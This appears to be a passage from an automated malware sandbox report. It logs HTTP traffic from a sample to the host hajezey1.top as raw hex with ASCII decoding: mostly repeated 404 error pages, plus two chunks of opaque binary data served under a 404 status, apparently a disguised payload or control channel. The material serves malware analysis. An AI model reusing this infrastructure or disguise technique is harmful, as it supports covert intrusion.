20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 